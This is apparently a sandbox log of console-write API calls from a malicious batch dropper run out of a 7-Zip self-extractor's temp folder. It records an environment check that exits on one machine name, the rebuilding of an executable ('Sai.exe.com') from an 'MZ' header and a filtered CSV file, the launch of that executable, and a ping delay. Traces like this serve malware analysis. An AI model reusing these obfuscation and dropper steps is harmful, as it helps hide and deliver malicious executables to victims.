WriteConsoleW
|
buffer:
Microsoft Windows [Version 6.1.7601]
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
if %userdomain%==DESKTOP-QO5QU33 exit 2
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
<nul set /p = "MZ" > Sai.exe.com
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
findstr /V /R "^eOTPybxfSDnddbthfAUjoedEzrkBUzRPDcAEenVFXQfgAFyMvnfMQnNqbfvwjSxmLIMVWAkREgfaMwrOYntvtyZyHAuMwUztcQDSTpQWhniBochvjIeNOXxFIGgvznPKVlXWnkUPIopGXbXjj$" Talismani.csv >> Sai.exe.com"
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
copy Discendere.csv V
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
1 file(s) copied.
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
start Sai.exe.com V
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ping 127.0.0.1 -n 30
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Pinging 127.0.0.1
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
with 32 bytes of data:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Reply from 127.0.0.1:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
bytes=32
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
time<1ms
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
TTL=128
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Reply from 127.0.0.1:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
bytes=32
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
time<1ms
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
TTL=128
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Reply from 127.0.0.1:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
bytes=32
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
time<1ms
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
TTL=128
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Reply from 127.0.0.1:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
bytes=32
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
time<1ms
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
TTL=128
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Reply from 127.0.0.1:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
bytes=32
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
time<1ms
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
TTL=128
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Reply from 127.0.0.1:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
bytes=32
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
time<1ms
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
TTL=128
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Reply from 127.0.0.1:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
bytes=32
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
time<1ms
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
TTL=128
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Reply from 127.0.0.1:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
bytes=32
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
time<1ms
console_handle:
0x00000007
|
1
|
1 |
0
|